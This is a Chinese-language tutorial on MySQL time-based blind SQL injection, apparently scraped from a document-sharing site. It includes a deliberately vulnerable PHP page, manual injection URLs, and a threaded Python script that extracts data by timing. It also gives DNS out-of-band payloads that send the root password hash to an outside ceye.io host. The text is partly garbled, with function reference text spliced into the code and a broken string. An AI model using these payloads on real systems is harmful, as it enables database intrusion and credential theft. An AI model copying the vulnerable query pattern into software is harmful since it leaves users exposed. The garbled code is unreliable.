时间延迟盲注详解
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
时间延迟盲注详解
0x00 延迟注⼊定义
延迟注⼊,是⼀种盲注的⼿法, 提交对执⾏时间铭感的函数sql 语句,通过执⾏时间的长短来判断是否执⾏成功,⽐如:正确的话会导致时间很长,错误的话会导致执⾏时间很短,
这就是所谓的⾼级盲注.SQLMAP 、穿⼭甲、胡萝⼘等主流注⼊⼯具可能检测不出,只能⼿⼯检测,利⽤脚本程序跑出结果。
0x01 延迟注⼊的函数
sleep() //延迟函数
if(condition,true,false) //条件语句
ascii() //转换成ascii 码
substring("string",strart,length) //mid()也⼀样,取出字符串⾥的第⼏位开始,长度多少的字符
If 表达式:IF(expr1,expr2,expr3)
如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL),则 IF()的返回值为expr2; 否则返回值则为 expr3
Mid 函数:MID(column_name,start[,length])
延时注⼊的原理就是,所要爆的信息的ascii 码正确时,产⽣延时,否则不延时
0x02 延迟注⼊实列
1.含有时间延迟注⼊代码
yanchi.php:
<?php
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","root");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysql_query($sql);
echo "this is a time blode ";
?>
2⼿⼯检查延迟注⼊
http://10.0.0.21/yanci.php?username=root' and sleep(5)%23
或者
http://10.0.0.21/yanci.php?username=root' and sleep(5) and 'xRsl'='xRsl#
或者
http://10.0.0.21/yanci.php?username=root' and If(ascii(substr(database(),1,1))=114,1,sleep(5))#
如果有注⼊,则延迟时间很长:
3.通过python 脚本来跑(这⾥跑出⽤户名)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2column_name 必需。
要提取字符的字段。
start
必需。
规定开始位置(起始值是 1)。
length 可选。
要返回的字符数。
如果省略,则 MID() 函数返回剩余⽂本。
import socket
import threading
import requests
class my_threading(threading.Thread):
def __init__(self, str,x):
threading.Thread.__init__(self)
self.str = str
self.x = x
def run(self):
global res
x=self.x
j = self.str
url = "http://10.0.0.21/yanci.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23 html = request(url)
verify = 'timeout'
if verify not in html:
res[str(j)] = 0
#print 1
else:
res[str(j)] = 1
def request(URL):
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, user_agent)
try:
request = urllib2.urlopen(req,timeout=2)
except Exception ,e:
time.sleep(2)
return'timeout'
return request.read()
def curl(url):
try:
start = time.clock()
requests.get(url)
end = time.clock()
return int(end)
except requests.RequestException as e:
print u"errory!"
exit()
def getLength():
i = 0
while True:
print "[+] Checking: %s \r" %i
url = "http://10.0.0.21/yanci.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
html = request(url)
verify = 'timeout'
if verify in html:
print "[+] leng: %s" %i
return i
def bin2dec(string_num):
return int(string_num, 2)
def getData(dataLength):
global res
data = ""
for x in range(dataLength):
x = x + 1
#print x
threads = []
for j in range(8):
result = ""
j = j + 1
sb = my_threading(j,x)
sb.setDaemon(True)
threads.append(sb)
#print j
for t in threads:
t.start()
for t in threads:
t.join()
#print res
tmp = ""
for i in range(8):
tmp = tmp + str(res[str(i+1)]) #print chr(bin2dec(tmp))
res = {}
result = chr(bin2dec(tmp))
print result
data = data + result
sb = None
print "[+] ok!"
print "[+] result:" + data
if __name__ == '__main__':
stop = False
res = {}
length = getLength()
getData(length)
4. sqlmap进⾏延迟注⼊
sqlmap.py -r q1.txt --dbms=mysql --time-sec=5
5.通过DNS LOG ⽇志记录来注⼊时间盲注
(1)获取⽤户名root的密码
http://10.0.0.21/yanci.php?username=root' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT concat(user,'_',mid(password,2,41)) from user where user='root' limit 1),'.89mxv7.ceye.io\\foobar'))),1,1)# (2)dns log记录为: 这⾥利⽤⽤http://ceye.io的DNS记录来注⼊
(3)获取⽤户名root密码的⼗六进值
http://10.0.0.21/yanci.php?username=root' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT hex(user())),'.89mxv7.ceye.io\\foobar'))),1,1)#
dns记录为:
(4)通过⼩葵⼯具查询得知:。